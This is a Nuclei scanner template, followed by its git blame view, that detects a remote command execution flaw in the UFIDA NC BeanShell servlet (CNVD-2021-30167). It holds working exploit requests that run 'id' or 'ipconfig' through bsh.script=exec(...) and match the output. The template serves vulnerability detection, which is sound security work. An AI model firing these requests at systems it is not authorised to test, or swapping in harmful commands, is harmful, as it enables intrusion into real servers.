nuclei-templates/http/cnvd/2021/CNVD-2021-30167.yaml

id: CNVD-2021-30167

info:
  name: UFIDA NC BeanShell Remote Command Execution
  author: pikpikcu
  severity: critical
  description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
  reference:
    - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
    - https://www.cnvd.org.cn/webinfo/show/6491
    - https://chowdera.com/2022/03/202203110138271510.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 2
  tags: cnvd2021,cnvd,beanshell,rce,yonyou

http:
  - raw:
      - | #linux
        POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        bsh.script=exec("id");
      - | #windows
        POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        bsh.script=exec("ipconfig");

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "uid="
          - "Windows IP"
        condition: or

      - type: word
        words:
          - "BeanShell Test Servlet"

      - type: status
        status:
          - 200
# digest: 490a0046304402204c68147fa92e08857a6c0b79bd9fec56f4e80397bd5f67365061730b8c35507502200dab5a42e472ba22b293104ee2b265e9a14995ac4e38a11db07f2e41e599d6fa:922c64590222798bb761d5b6d8e72950
misc changes 2021-06-03 17:17:18 +00:00			`id: CNVD-2021-30167`
Create nc-bsh-servlet-rce.yaml 2021-06-01 08:28:04 +00:00
			`info:`
Enhancement: cnvd/2021/CNVD-2021-30167.yaml by cs 2022-07-05 14:56:19 +00:00			`name: UFIDA NC BeanShell Remote Command Execution`
Create nc-bsh-servlet-rce.yaml 2021-06-01 08:28:04 +00:00			`author: pikpikcu`
Dashboard Enhancements + Severity Matching (#5245) Dashboard Enhancements + Severity Matching 2022-08-29 20:21:30 +00:00			`severity: critical`
Enhancement: cnvd/2021/CNVD-2021-30167.yaml by cs 2022-07-05 14:56:19 +00:00			`description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A`
			`- https://www.cnvd.org.cn/webinfo/show/6491`
Enhancement: cnvd/2021/CNVD-2021-30167.yaml by cs 2022-07-05 14:56:19 +00:00			`- https://chowdera.com/2022/03/202203110138271510.html`
			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
templateman update 2023-10-14 11:27:55 +00:00			`cvss-score: 10`
Enhancement: cnvd/2021/CNVD-2021-30167.yaml by cs 2022-07-05 14:56:19 +00:00			`cwe-id: CWE-77`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cnvd2021,cnvd,beanshell,rce,yonyou`
Create nc-bsh-servlet-rce.yaml 2021-06-01 08:28:04 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create nc-bsh-servlet-rce.yaml 2021-06-01 08:28:04 +00:00			`- raw:`
			`- \| #linux`
			`POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
Update nc-bsh-servlet-rce.yaml 2021-06-02 12:37:32 +00:00
misc changes 2021-06-03 17:17:18 +00:00			`bsh.script=exec("id");`
Create nc-bsh-servlet-rce.yaml 2021-06-01 08:28:04 +00:00			`- \| #windows`
			`POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

Update nc-bsh-servlet-rce.yaml 2021-06-02 12:37:32 +00:00			`bsh.script=exec("ipconfig");`
Create nc-bsh-servlet-rce.yaml 2021-06-01 08:28:04 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
misc changes 2021-06-03 17:17:18 +00:00			`- "uid="`
Create nc-bsh-servlet-rce.yaml 2021-06-01 08:28:04 +00:00			`- "Windows IP"`
misc changes 2021-06-03 17:17:18 +00:00			`condition: or`

			`- type: word`
			`words:`
			`- "BeanShell Test Servlet"`
Create nc-bsh-servlet-rce.yaml 2021-06-01 08:28:04 +00:00
			`- type: status`
			`status:`
Update and rename cnvd/CNVD-2021-30167.yaml to cnvd/2021/CNVD-2021-30167.yaml 2022-01-04 06:27:48 +00:00			`- 200`
Auto Template Signing [Fri Jan 26 08:31:11 UTC 2024] :robot: 2024-01-26 08:31:11 +00:00			`# digest: 490a0046304402204c68147fa92e08857a6c0b79bd9fec56f4e80397bd5f67365061730b8c35507502200dab5a42e472ba22b293104ee2b265e9a14995ac4e38a11db07f2e41e599d6fa:922c64590222798bb761d5b6d8e72950`